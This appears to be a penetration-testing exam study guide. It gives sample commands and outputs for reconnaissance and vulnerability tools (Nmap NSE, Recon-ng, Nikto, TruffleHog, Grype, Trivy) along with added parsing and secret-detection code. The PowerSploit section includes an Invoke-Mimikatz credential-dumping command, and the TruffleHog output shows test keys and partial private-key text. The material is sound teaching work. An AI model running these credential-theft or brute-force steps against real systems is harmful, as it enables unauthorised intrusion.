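The raw JSON above is verbose; what a tester actually wants from it is one row per host and IP (which ASN it sits in, what DNSdumpster banner-grabbed) and the mail-sending sources declared in the SPF record. The code below is an added example, not from the original post or from DNSdumpster: `SAMPLE_JSON` is a constructed document following the shape shown above (the two hosts and TXT records copied from it), and `summarize_hosts`, `parse_spf` and `group_by_asn` are my own helper names.

```python
"""Summarise a DNSdumpster API response: per-host IPs, ASN, banners, and the SPF policy.

Added example, not from the original post or from DNSdumpster. The sample
document is constructed in the shape of the API output shown above.
"""
import json
from typing import Dict, List, Optional

SAMPLE_JSON = r'''
{
  "a": [
    {"host": "10year.kali.org",
     "ips": [{"asn": "13335", "asn_name": "CLOUDFLARENET", "asn_range": "104.18.0.0/20",
              "banners": {"http": {"apps": ["Cloudflare"], "server": "cloudflare",
                                   "title": "Direct IP access not allowed "},
                          "http8080": {"apps": ["Cloudflare"], "server": "cloudflare",
                                       "title": "Direct IP access not allowed "},
                          "ip": "104.18.5.159"},
              "country": "unknown", "country_code": "??", "ip": "104.18.5.159", "ptr": ""}]},
    {"host": "aeacus.kali.org",
     "ips": [{"asn": "16276", "asn_name": "OVH, FR", "asn_range": "51.222.0.0/16",
              "banners": {"ip": "51.222.80.5",
                          "ssh": {"banner": "SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u6"}},
              "country": "Canada", "country_code": "CA", "ip": "51.222.80.5",
              "ptr": "ns576245.ip-51-222-80.net"}]}
  ],
  "total_a_recs": 63,
  "txt": [
    "\"MS=2F24AAB1EA3933DA8A05BF4B28C70033E0001820\"",
    "\"v=spf1 a ip4:208.88.127.98 ip4:52.44.83.41 include:_spf.google.com include:sendgrid.net ~all\""
  ]
}
'''


def load_sample() -> dict:
    return json.loads(SAMPLE_JSON)


def summarize_hosts(doc: dict) -> List[Dict[str, object]]:
    """One row per (host, ip): ASN, country, and the services DNSdumpster saw banners for."""
    rows = []
    for entry in doc.get("a", []):
        for ip in entry.get("ips", []):
            banners = ip.get("banners", {})
            services = sorted(k for k in banners if k != "ip")   # "ip" is metadata, not a service
            rows.append({
                "host": entry["host"],
                "ip": ip["ip"],
                "asn": f'AS{ip["asn"]} {ip["asn_name"]}',
                "country": ip.get("country_code", "??"),
                "services": services,
                "ssh_banner": banners.get("ssh", {}).get("banner"),
            })
    return rows


def group_by_asn(rows: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Which hosts live in which network: a quick view of hosting providers in use."""
    groups: Dict[str, List[str]] = {}
    for row in rows:
        groups.setdefault(str(row["asn"]), []).append(str(row["host"]))
    return groups


def parse_spf(txt_records: List[str]) -> Optional[Dict[str, object]]:
    """Pull the authorised senders out of the SPF TXT record; None if no SPF is published."""
    for raw in txt_records:
        rec = raw.strip().strip('"')
        if not rec.startswith("v=spf1"):
            continue
        spf: Dict[str, object] = {"ip4": [], "ip6": [], "include": [], "a": False, "mx": False, "all": None}
        for term in rec.split()[1:]:
            if term.startswith("ip4:"):
                spf["ip4"].append(term[4:])
            elif term.startswith("ip6:"):
                spf["ip6"].append(term[4:])
            elif term.startswith("include:"):
                spf["include"].append(term[8:])
            elif term == "a":
                spf["a"] = True
            elif term == "mx":
                spf["mx"] = True
            elif term.endswith("all"):
                spf["all"] = term    # "~all" softfail, "-all" hardfail, "+all"/"?all" permissive
        return spf
    return None


if __name__ == "__main__":
    doc = load_sample()
    for row in summarize_hosts(doc):
        print(row)
    print(group_by_asn(summarize_hosts(doc)))
    print(parse_spf(doc["txt"]))
```

Replace `load_sample()` with `json.load(open("dnsdumpster.json"))` to run it over the output of the `curl` call above; the `include:` list is the set of third parties allowed to send mail as the domain, which is worth recording in the report alongside the `~all` qualifier.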
    
    

15. Nmap Scripting Engine (NSE)

  • Use Case: Deeper enumeration & vuln checks (SMB, SSL/TLS, HTTP, etc.). Reference Portal

  • Input Example:

    nmap -sV --script "vuln and safe" 192.168.1.10
    
    nmap -p80 --script http-apache-server-status 10.10.125.34
    
    
    Script categories:
    
    1. auth: Scripts that deal with authentication (e.g., brute force, credential checks).
    2. broadcast: Scripts that discover hosts by sending broadcast queries (e.g., DHCP, ARP).
    3. brute: Perform brute-force attacks against services (e.g., SSH, FTP).
    4. default: Scripts run when you use -sC or --script=default. Safe, general info gathering.
    5. discovery: Host and service discovery beyond basic port scanning (e.g., SNMP enumeration).
    6. dos: Denial-of-service checks (⚠️ intrusive).
    7. exploit: Attempt to exploit vulnerabilities (⚠️ very intrusive).
    8. external: Scripts that query external resources (e.g., WHOIS, GeoIP).
    9. fuzzer: Send unexpected input to services to find bugs (⚠️ intrusive).
    10. intrusive: Scripts that might crash or alter services (⚠️ use only with permission).
    11. malware: Detect malware infections or backdoors.
    12. safe: Scripts considered non-intrusive and unlikely to harm the target.
    13. version: Service version detection enhancements.
    14. vuln: Check for known vulnerabilities or insecure configurations.
    
    
  • Output Example:

    PORT   STATE SERVICE VERSION
    445/tcp open  microsoft-ds
    | smb-vuln-ms17-010:
    |   VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1
    |     State: VULNERABLE
    |_    References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144
    
    PORT   STATE SERVICE
    80/tcp open  http
    | http-apache-server-status:
    |   Heading: Apache Server Status for example.com (via 127.0.1.1)
    |   Server Version:  Apache/2.4.12 (Ubuntu)
    |   Server Built:  Jul 24 2015 15:59:00
    |   Server Uptime:   53 minutes 31 seconds
    |   Server Load:  0.00 0.01 0.05
    |   VHosts:
    |_    www.example.com:80  GET /server-status HTTP/1.1
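
  • Worked example (added here, not code from the original post): once a scan is written with -oX, the NSE results live in <script> elements under each <port>, and vuln-category scripts also emit structured <table>/<elem key="state"> children. The parser below pulls every script result out of that XML and flags the ones reporting a VULNERABLE state, so a large scan can be triaged without grepping text output. The XML is a constructed fragment mirroring the smb-vuln-ms17-010 output above, not a real capture.

```python
"""Extract NSE script results from an Nmap XML report (nmap -oX).

Added example, not part of the original post. SAMPLE_XML is constructed
to mirror the smb-vuln-ms17-010 text output shown above.
"""
import xml.etree.ElementTree as ET

# Constructed sample of what `nmap -sV --script vuln -oX scan.xml 192.168.1.10` might write
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV --script vuln -oX scan.xml 192.168.1.10">
  <host>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds"/>
        <script id="smb-vuln-ms17-010" output="&#10;  VULNERABLE:&#10;  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)&#10;    State: VULNERABLE">
          <table key="CVE-2017-0143">
            <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
            <elem key="state">VULNERABLE</elem>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.41"/>
        <script id="http-server-header" output="Apache/2.4.41 (Ubuntu)"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_script_results(xml_text):
    """Return one dict per (host, port, script) found in the report."""
    results = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            svc = port.find("service")
            for script in port.findall("script"):
                # Structured output: any <elem key="state"> nested under the script
                states = {e.text for e in script.iter("elem") if e.get("key") == "state"}
                output = script.get("output") or ""
                results.append({
                    "host": addr,
                    "port": int(port.get("portid")),
                    "proto": port.get("protocol"),
                    "service": svc.get("name") if svc is not None else "",
                    "script": script.get("id"),
                    # Fall back to the free-text output for scripts without a vulns table
                    "vulnerable": "VULNERABLE" in states or "State: VULNERABLE" in output,
                    "output": output.strip(),
                })
    return results


def vulnerable_findings(xml_text):
    """Only the script results that report a VULNERABLE state."""
    return [r for r in parse_script_results(xml_text) if r["vulnerable"]]


if __name__ == "__main__":
    for r in parse_script_results(SAMPLE_XML):
        flag = "VULN" if r["vulnerable"] else "info"
        print(f"{flag:4} {r['host']}:{r['port']}/{r['proto']} {r['script']}")
```

    Feed it `nmap ... -oX scan.xml` output instead of SAMPLE_XML for real runs. Checking the structured <elem key="state"> is more reliable than string-matching the text output, but the fallback is kept for scripts that only print prose.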
    
    

16. WiGLE.net

  • Use Case: Locate SSIDs/BSSIDs and rough geolocation from crowd‑sourced wardriving data.

  • Input Example:
    (Web UI or API)

    Search SSID: "CorpWiFi"
    
  • Output Example:

    SSID: CorpWiFi
    BSSID: AA:BB:CC:DD:EE:FF
    Last seen: 2025-03-14
    Approx. location: 51.746, -2.283
    Channel: 6  Encryption: WPA2
    Signal Strength: -65 dBm
    

17. InSSIDer

  • Use Case: (GUI-based) Local wireless survey (channels, signal strengths, RSSI, security) to scope wireless targets. Real-time client packet analytics available with paid-for license Site

  • Input Example:
    (GUI-based tool)

    Scan local Wi-Fi networks
    
  • Output Example: Images

    [...]
    SSID: CorpWiFi  BSSID: 9C:XX:YY:ZZ:..  Signal: -56 dBm  Clients: 3  Ch: 114 [128]  Width: 20 MHz  Security: None | WPA Personal/Enterprise | WPA2 Personal/Enterprise  Mode: b/g/n/ax  Basic Rates: 1,2,5.5,11  Max. Rate: 243.8  Last Seen: Now
    [...]
    

18. OSINTframework.com

  • Use Case: Curated directory to quickly jump to the right OSINT tool per data type (people, domains, socials).

  • Input Example:
    Navigate: Domain Name → DNS → Subdomains

  • Output Example:

    
    Links:
    - DNSDumpster
    - Amass
    - Sublist3r
    - CRT.sh
    
    

19. Recon-ng

  • Use Case: Modular OSINT framework with workspace, data model, API keys, and modules. Github

  • Input Example:

    recon-ng
    [recon-ng] > workspaces create thmredteam
    [recon-ng][thmredteam] > db insert domains
    
    domain (TEXT): example.com
    notes (TEXT): 
    [*] 1 rows affected.
    
    [recon-ng][thmredteam] > marketplace search domains-
    [recon-ng][thmredteam] > marketplace install brute_hosts
    
    [*] Module installed: recon/domains-hosts/brute_hosts
    [*] Reloading modules...
                                                                                        
    [recon-ng][thmredteam] > modules load brute_hosts
    [recon-ng][thmredteam][brute_hosts] > run
    
    CTRL-C
    [recon-ng][thmredteam] >  modules load recon/domains-hosts/hackertarget
    [recon-ng][thmredteam][hackertarget] > options set SOURCE kali.org
    SOURCE => kali.org
    [recon-ng][thmredteam][hackertarget] > run
    
    
    marketplace search KEYWORD to search for available modules with keyword.
      - D = Dependencies
      - K = Key required
    marketplace info MODULE to provide information about the module in question.
    marketplace install MODULE to install the specified module into Recon-ng.
    marketplace remove MODULE to uninstall the specified module.
    
    
    
    Keys
    Some modules cannot be used without a key for the respective service API. K indicates that you need to provide the relevant service key to use the module in question.
    
    - keys list lists the keys
    - keys add KEY_NAME KEY_VALUE adds a key
    - keys remove KEY_NAME removes a key
    
    Once you have the set of modules installed, you can proceed to load and run them.
    
    - modules load MODULE loads an installed module
    - CTRL + C unloads the module.
    - info to review the loaded module’s info.
    - options list lists available options for the chosen module.
    - options set NAME VALUE
    - run to execute the loaded module.
    
    
  • Output Example:

    
    [recon-ng][thmredteam] > marketplace search domains-
    [*] Searching module index for 'domains-'...
    
    +---------------------------------------------------------------------------------------------+
    |                     Path                     | Version |     Status    |  Updated   | D | K |
    +---------------------------------------------------------------------------------------------+
    | recon/domains-companies/censys_companies     | 2.1     | not installed | 2022-01-31 | * | * |
    | recon/domains-companies/pen                  | 1.1     | not installed | 2019-10-15 |   |   |
    | recon/domains-companies/whoxy_whois          | 1.1     | not installed | 2020-06-24 |   | * |
    | recon/domains-contacts/hunter_io             | 1.3     | not installed | 2020-04-14 |   | * |
    | recon/domains-contacts/metacrawler           | 1.1     | not installed | 2019-06-24 | * |   |
    | recon/domains-contacts/pen                   | 1.1     | not installed | 2019-10-15 |   |   |
    | recon/domains-contacts/pgp_search            | 1.4     | not installed | 2019-10-16 |   |   |
    [...]
    | recon/domains-hosts/brute_hosts              | 1.0     | not installed | 2019-06-24 |   |   |
    [...]
    
    
    
      -----------
      EXAMPLE.COM
      -----------
      [*] No Wildcard DNS entry found.
      [*] 01.example.com => No record found.
      [*] 03.example.com => No record found.
      [*] 11.example.com => No record found.
      [...]
      [*] www.example.com => (CNAME) www.example.com-v4.edgesuite.net
      [*] ws5.example.com => No record found.
      [*] ws7.example.com => No record found.
      [*] ws9.example.com => No record found.
      [...]  
      [*] www.example.com => (A) 23.216.154.163
      [*] Country: None
      [*] Host: www.example.com
      [*] Ip_Address: 23.216.154.163
      [*] Latitude: None
      [*] Longitude: None
      [*] Notes: None
      [*] Region: None
      [...]
      -------
      SUMMARY
      -------
      [*] 6 total (5 new) hosts found.
      [recon-ng][thmredteam][brute_hosts] > 
    
    
    
      --------
      KALI.ORG
      --------
      [*] Country: None
      [*] Host: 10year.kali.org
      [*] Ip_Address: 104.18.4.159
      [*] Latitude: None
      [*] Longitude: None
      [*] Notes: None
      [*] Region: None
      [*] --------------------------------------------------
      [...]
      -------
      SUMMARY
      -------
      [*] 69 total (61 new) hosts found.  
    
    

🧪 Tips (Exam‑useful)

  • Validate Nmap results with NSE scripts for deeper info.
  • WHOIS privacy may hide registrant details.
  • Shodan often returns outdated banners—verify manually.

Domain 3.0 Tools and Examples

1. Nikto

  • Use Case: Web vulnerability scanning. Github

  • Input Example:

    nikto -h 10.10.28.201 -p 8080
    
    # Show any cookies received
    nikto -h 10.10.28.201 -p 8080 -Display 2
    
    nikto -h 10.10.28.201 -Plugin cgi
    
    # Scan with credentials
    nikto -h http://10.10.131.92:1234/manager/html -id bob:bubbles
    
  • Output Example:

    
    - Nikto v2.1.5
    ---------------------------------------------------------------------------
    + Target IP:          10.10.28.201
    + Target Hostname:    10.10.28.201
    + Target Port:        8080
    + Start Time:         2025-11-09 11:32:39 (GMT0)
    ---------------------------------------------------------------------------
    + Server: Apache-Coyote/1.1
    + Retrieved x-powered-by header: Servlet/3.0; JBossAS-6
    + Server leaks inodes via ETags, header found with file /, fields: 0xW/1554 0x1313480882000 
    + The anti-clickjacking X-Frame-Options header is not present.
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + OSVDB-39272: favicon.ico file identifies this server as: JBoss Server
    + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS 
    + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
    + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
    + Cookie JSESSIONID created without the httponly flag
    + 6544 items checked: 0 error(s) and 7 item(s) reported on remote host
    + End Time:           2025-11-09 11:32:48 (GMT0) (9 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
    
    [...]  
    + /admin-console/config.php sent cookie: JSESSIONID=BD85EA69D0C870800326239E08D80D92; Path=/admin-console
    + Cookie JSESSIONID created without the httponly flag
    + /jmx-console/HtmlAdaptor?action=inspectMBean&name=Catalina%3Atype%3DServer sent cookie: JSESSIONID=31F8DA9F45F7E89A965A6F4BB65A8BA7; Path=/jmx-console
    + 6544 items checked: 0 error(s) and 7 item(s) reported on remote host
    + End Time:           2025-11-09 11:25:44 (GMT0) (9 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
    
    
    [...]
    + Server: Apache/2.4.7 (Ubuntu)
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + 6544 items checked: 0 error(s) and 0 item(s) reported on remote host
    + End Time:           2025-11-09 11:34:19 (GMT0) (1 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
    

2. OpenVAS

  • Use Case: Network vulnerability scanning.

  • Input Example:

    # Legacy OMP client (current Greenbone builds use gvm-cli from gvm-tools instead);
    # a scan is started by referencing the UUID of an existing task
    omp -u admin -w pass --xml='<start_task task_id="TASK-UUID"/>'
    
  • Output Example:

    Scan report: CVE-2021-1234
    

3. Nessus

  • Use Case: Comprehensive vulnerability scanning.

  • Input Example:

    # nessuscli manages the scanner itself (registration, plugin updates);
    # scans are created and launched from the web UI (https://host:8834) or the REST API
    nessuscli update --plugins-only
    
  • Output Example:

    High severity vulnerabilities found
    

4. TruffleHog

  • Use Case: Secrets scanning in Git, S3 buckets, chats, wikis, logs, API testing platforms, object stores and filesystems. Github

  • Input Example:

    trufflehog git https://github.com/trufflesecurity/test_keys --results=verified
    
    trufflehog filesystem super_secret_folder
    
    trufflehog docker --image sagikazarmark/dvwa
    
  • Output Example:

    
    🐷🔑🐷  TruffleHog. Unearth your secrets. 🐷🔑🐷
    
    2025-11-08T15:45:23Z	info-0	trufflehog	running source	{"source_manager_worker_id": "qEhpO", "with_units": true}
    2025-11-08T15:45:23Z	info-0	trufflehog	scanning repo	{"source_manager_worker_id": "qEhpO", "unit_kind": "dir", "unit": "/tmp/trufflehog-6505-708392298", "repo": "https://github.com/trufflesecurity/test_keys"}
    ✅ Found verified result 🐷🔑
    Detector Type: AWS
    Decoder Type: PLAIN
    Raw result: AKIAQYLPMN5HHHFPZAM2
    Arn: arn:aws:iam::052310077262:user/canarytokens.com@@c20nnjzlioibnaxvt392i9ope
    Resource_type: Access key
    Account: 052310077262
    Message: This is an AWS canary token generated at canarytokens.org.
    Is_canary: true
    Commit: 0416560b1330d8ac42045813251d85c688717eaf
    Email: counter <[email protected]>
    File: new_key
    Line: 2
    Repository: https://github.com/trufflesecurity/test_keys
    Repository_local_path: /tmp/trufflehog-6505-708392298
    Timestamp: 2023-10-19 02:56:37 +0000
    
    [...]
    
    ✅ Found verified result 🐷🔑
    Detector Type: URI
    Decoder Type: PLAIN
    Raw result: https://admin:[email protected]
    Commit: 690829e7f11c59c6bc8c40024b2595f4e5c9286d
    Email: Andrea Luzzardi <[email protected]>
    File: leaky
    Line: 3
    Repository: https://github.com/trufflesecurity/test_keys
    Repository_local_path: /tmp/trufflehog-6505-708392298
    Timestamp: 2025-01-22 01:13:13 +0000
    
    2025-11-08T15:45:25Z	info-0	trufflehog	finished scanning	{"chunks": 14, "bytes": 6959, "verified_secrets": 4, "unverified_secrets": 0, "scan_duration": "1.939086284s", "trufflehog_version": "3.90.13", "verification_caching": {"Hits":0,"Misses":6,"HitsWasted":0,"AttemptsSaved":0,"VerificationTimeSpentMS":4198}}
    
    
    
    [...]
    ✅ Found verified result 🐷🔑
    Detector Type: AWS
    Decoder Type: PLAIN
    Raw result: AKIAQYLPMN5HHHFPZAM2
    Is_canary: true
    Arn: arn:aws:iam::052310077262:user/canarytokens.com@@c20nnjzlioibnaxvt392i9ope
    Resource_type: Access key
    Account: 052310077262
    Message: This is an AWS canary token generated at canarytokens.org.
    File: super_secret_folder/secret.txt
    Line: 3
    [...]
    
    
    
    Found unverified result 🐷🔑❓
    Detector Type: PrivateKey
    Decoder Type: PLAIN
    Raw result: -----BEGIN PRIVATE KEY-----
    MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDfDRwfKh8yOYpm
    uQkkhVYdXwSDpZaL0B1gqaGzvjJ2n9PjHxxw0CV2UbHmyaqBNPlRW+OtHYRL1np/
    [...]
    qeMXZOZ87ZYIYvPP0JRqutfUb1SAAAPW8o7uU1I4uNvqIa6jU4PaFazqicFGVYcp
    pbAt7TBWU468BGkweQfWK0s=
    -----END PRIVATE KEY-----
    File: /etc/ssl/private/ssl-cert-snakeoil.key
    Image: sagikazarmark/dvwa
    Layer: sha256:e6c91bb380b46e53f1b44edc6bb8992f8a1f89c553050b186a5159e4c66778a5
    Tag: latest
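
  • Worked example (added here, not TruffleHog's code or output): the scanner above runs three stages over every chunk of input, a detector pattern match, a cheap plausibility filter so that placeholders are not reported, and a verification step that tries the credential against the provider (that is what "verified result" means in the output). The minimal detector below shows those stages for the AWS access key ID, private key and user:password@host URI cases seen above. Verification is a pluggable hook stubbed to "unverified" because nothing here touches the network; SAMPLE and every key in it are constructed and fake.

```python
"""Minimal secrets detector in the spirit of TruffleHog (added example).

Not TruffleHog's code. SAMPLE below is constructed; the key material in
it is fake and is not a live credential.
"""
import math
import re
from dataclasses import dataclass

# Detector patterns (subset). AWS access key IDs are 20 chars starting AKIA/ASIA;
# the URI detector catches scheme://user:password@host like the 'leaky' file above.
DETECTORS = {
    "AWS": re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b"),
    "PrivateKey": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH |)PRIVATE KEY-----[\s\S]+?-----END (?:RSA |EC |OPENSSH |)PRIVATE KEY-----"
    ),
    "URI": re.compile(r"\b[a-z][a-z0-9+.-]*://[^\s/:@]+:([^\s/@]+)@[A-Za-z0-9.-]+"),
}
# Plausibility filter: bits of entropy per character, applied only where listed,
# so AKIAAAAAAAAAAAAAAAAA-style placeholders are dropped before verification
MIN_ENTROPY = {"AWS": 3.0}


@dataclass
class Finding:
    detector: str
    raw: str
    line: int
    verified: bool


def shannon_entropy(s):
    """Shannon entropy of s in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def scan_text(text, verify=lambda detector, raw: False):
    """Run every detector over text and return findings sorted by line.

    verify(detector, raw) stands in for TruffleHog's live check against the
    provider API; the default never verifies anything (offline).
    """
    findings = []
    for name, pattern in DETECTORS.items():
        for m in pattern.finditer(text):
            raw = m.group(0)
            secret = m.group(1) if m.groups() else raw
            if name in MIN_ENTROPY and shannon_entropy(secret) < MIN_ENTROPY[name]:
                continue  # looks like a placeholder, not a real key
            line = text.count("\n", 0, m.start()) + 1
            findings.append(Finding(name, raw, line, verify(name, raw)))
    return sorted(findings, key=lambda f: f.line)


# Constructed sample input (fake values; nothing here is a live credential)
SAMPLE = """\
# config.py
AWS_ACCESS_KEY_ID = "AKIAEXAMPLEKEYID0001"
AWS_ACCESS_KEY_ID_PLACEHOLDER = "AKIAAAAAAAAAAAAAAAAA"
DB_URL = "https://admin:hunter2@db.example.internal"
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDfDRwfKh8yOYpm
-----END PRIVATE KEY-----
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE):
        status = "verified" if f.verified else "unverified"
        print(f"{status:10} {f.detector:10} line {f.line}: {f.raw.splitlines()[0]}")
```

    The entropy gate is why a real scanner can skip obvious dummies without a network round trip; the verify hook is where the "Is_canary: true" style metadata in the output above comes from, since the provider's answer is what distinguishes a live key from a dead or decoy one.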
    
    

5. BloodHound

  • Use Case: AD attack path mapping.

  • Input Example: GUI-based after data collection

  • Output Example: Graph of privilege escalation paths


6. PowerSploit

  • Use Case: Post‑exploitation checks during vuln validation (be cautious & within scope).

  • Input Example: CheatSheet

    Import-Module PowerSploit
    Invoke-Mimikatz
    
    Import-Module .\PowerSploit\PowerSploit.psd1
    Invoke-UserHunter
    
    Import-Module .\CodeExecution\Invoke-WmiCommand.ps1
    Invoke-WmiCommand -Payload { ipconfig /all } -ComputerName $env:COMPUTERNAME | Select-Object -ExpandProperty PayloadOutput
    
  • Output Example:

    Successfully dumped credentials:
    Username: Administrator
    Password: P@ssw0rd!
    
    Found logged-on user: EXAMPLE\jdoe on HOST: WS-07
    
    Windows IP Configuration
    
     Host Name . . . . . . . . . . . . : WATCHMAN-DC
     Primary Dns Suffix  . . . . . . . : WATCH.local
     Node Type . . . . . . . . . . . . : Hybrid
     IP Routing Enabled. . . . . . . . : No
     WINS Proxy Enabled. . . . . . . . : No
     DNS Suffix Search List. . . . . . : eu-west-1.ec2-utilities.amazonaws.com
                                         eu-west-1.compute.internal
    [...]
    
    

7. Grype

  • Use Case: Scan a Docker image or SBOM for vulnerabilities before deploying to production. Github

  • Input Example:

    grype docker:sagikazarmark/dvwa:latest > grype.txt
    
    grype dir:.
    
  • Output Example:

     ✔ Loaded image                                                                                                              sagikazarmark/dvwa:latest 
     ✔ Parsed image                                                                sha256:e901498e651ae2806f3fda7406d97b7e9294eaada44d1d4970e9b28189b6d967 
     ✔ Cataloged contents                                                                 32a1c74f7535f93b6a02b2325a3b97780ffd825613ef49b691bd55fb454000e4 
       ├── ✔ Packages                        [219 packages]  
       ├── ✔ Executables                     [1,117 executables]  
       ├── ✔ File metadata                   [9,149 locations]  
       ├── ✔ File digests                    [9,149 files]  
     ✔ Scanned for vulnerabilities     [1910 vulnerability matches]  
       ├── by severity: 0 critical, 203 high, 1001 medium, 184 low, 522 negligible
    
    NAME                     INSTALLED               FIXED IN                   TYPE  VULNERABILITY     SEVERITY    EPSS           RISK          
    libapache2-mod-php5      5.6.30+dfsg-0+deb8u1    5.6.40+dfsg-0+deb8u7       deb   CVE-2019-11043    High        94.1% (99th)   82.5   (kev)  
    php5                     5.6.30+dfsg-0+deb8u1    5.6.40+dfsg-0+deb8u7       deb   CVE-2019-11043    High        94.1% (99th)   82.5   (kev)  
    php5-cli                 5.6.30+dfsg-0+deb8u1    5.6.40+dfsg-0+deb8u7       deb   CVE-2019-11043    High        94.1% (99th)   82.5   (kev)  
    php5-common              5.6.30+dfsg-0+deb8u1    5.6.40+dfsg-0+deb8u7       deb   CVE-2019-11043    High        94.1% (99th)   82.5   (kev)  
    php5-gd                  5.6.30+dfsg-0+deb8u1    5.6.40+dfsg-0+deb8u7       deb   CVE-2019-11043    High        94.1% (99th)   82.5   (kev)  
    php5-mysql               5.6.30+dfsg-0+deb8u1    5.6.40+dfsg-0+deb8u7       deb   CVE-2019-11043    High        94.1% (99th)   82.5   (kev)  
    php5-readline            5.6.30+dfsg-0+deb8u1    5.6.40+dfsg-0+deb8u7       deb   CVE-2019-11043    High        94.1% (99th)   82.5   (kev)  
    libapache2-mod-php5      5.6.30+dfsg-0+deb8u1    5.6.39+dfsg-0+deb8u1       deb   CVE-2018-19518    High        94.0% (99th)   70.5
    
    [...]
    
    
    ✔ Indexed file system                                                                                                                               . 
    ✔ Cataloged contents                                                                 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 
      ├── ✔ Packages                        [13,819 packages]  
      ├── ✔ Executables                     [1,569 executables]  
      ├── ✔ File metadata                   [2,791 locations]  
      ├── ✔ File digests                    [2,791 files]  
    ✔ Scanned for vulnerabilities     [1092 vulnerability matches]  
      ├── by severity: 76 critical, 409 high, 520 medium, 87 low, 0 negligible
      ├── by status:   1054 fixed, 38 not-fixed, 0 ignored
    [0000]  WARN no explicit name and version provided for directory source, deriving artifact ID fro[...]
    [0280]  WARN Unable to determine the OS distribution of some packages. This may result in missing vulnerabilities. You may specify a distro using: --dist[...]
    
    NAME                          INSTALLED                       FIXED IN                                         TYPE           VULNERABILITY        SEVERITY  EPSS           RISK          
    spring-beans                  4.3.7.RELEASE                   5.2.20.RELEASE                                   java-archive   GHSA-36p3-wjmg-h94x  Critical  94.4% (99th)   98.7   (kev)  
    xstream                       1.4.9                           1.4.11                                           java-archive   GHSA-hf23-9pf7-388p  Critical  91.9% (99th)   86.4          
    pillow                        9.5.0                           10.0.1                                           python         GHSA-j7hp-h8jx-5ppr  High      94.1% (99th)   85.6   (kev)  
    xstream                       1.4.9                           1.4.18                                           java-archive   GHSA-j9h8-phrw-h4fh  High      94.4% (99th)   84.0   (kev)  
    stdlib                        go1.17.5                        *1.20.10, 1.21.3                                 go-module      CVE-2023-44487       High      94.4% (99th)   78.8   (kev)  
    jackson-databind              2.8.3                           2.8.11                                           java-archive   GHSA-rfx6-vp9g-rh7v  Critical  79.8% (99th)   75.0
    
    [...]
    
    

8. Trivy

  • Use Case: Perform a full security audit of an image or repo, including CVEs and hardcoded secrets. Github

  • Input Example:

    trivy image  sagikazarmark/dvwa
    
    trivy fs . --scanners vuln > vulns.txt
    
  • Output Example:

    
     sagikazarmark/dvwa (debian 8.7)
    ===============================
    Total: 1327 (UNKNOWN: 41, LOW: 100, MEDIUM: 572, HIGH: 432, CRITICAL: 182)
    
    [...]
    
    | Library  | Vulnerability     | Severity  | Status | Installed Version       | Fixed Version             | Title                                                                 |
    |----------|-------------------|-----------|--------|-------------------------|---------------------------|-----------------------------------------------------------------------|
    | apache2  | CVE-2017-3167     | CRITICAL  | fixed  | 2.4.10-10+deb8u8        | 2.4.10-10+deb8u9          | httpd: ap_get_basic_auth_pw() authentication bypass                   |
    
    [...]
    
    
    Desktop/Tools/C2/Covenant/Covenant/bin/Debug/netcoreapp3.1/Covenant.deps.json (dotnet-core)
    ===========================================================================================
    Total: 6 (UNKNOWN: 0, LOW: 0, MEDIUM: 5, HIGH: 1, CRITICAL: 0)
    
    | Library                                       | Vulnerability      | Severity | Status | Installed Version | Fixed Version              | Title                                               |
    |-----------------------------------------------|--------------------|----------|--------|-------------------|----------------------------|-----------------------------------------------------|
    | Microsoft.AspNetCore.Authentication.JwtBearer | CVE-2021-34532     | MEDIUM   | fixed  | 3.1.3             | 2.1.29, 3.1.18, 5.0.9      | dotnet: ASP.NET Core JWT token logging              |
    |                                               |                    |          |        |                   |                            | [https://avd.aquasec.com/nvd/cve-2021-34532         |
    
    [...]
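
  • Worked example (added here, not Grype's or Trivy's code): the tables above are fine for reading, but in a pipeline you want a pass/fail decision, and the interesting policy question is what to do with findings that have no fix. Trivy's JSON report (trivy image --format json -o report.json IMAGE) has a top-level "Results" list; each entry carries a "Target" and a "Vulnerabilities" list whose items include VulnerabilityID, PkgName, InstalledVersion, FixedVersion (absent or empty when no fix exists), Severity and Title. The gate below blocks on CRITICAL/HIGH findings that already have a fix and only reports the rest. REPORT is a constructed fragment in that shape; the two CVE rows mirror the ones in the output above, the EXAMPLE-* rows are placeholders.

```python
"""CI gate over a Trivy JSON report (added example, not Trivy's code).

REPORT is a constructed fragment in Trivy's JSON layout; the EXAMPLE-*
identifiers are placeholders, not real advisories.
"""
import json

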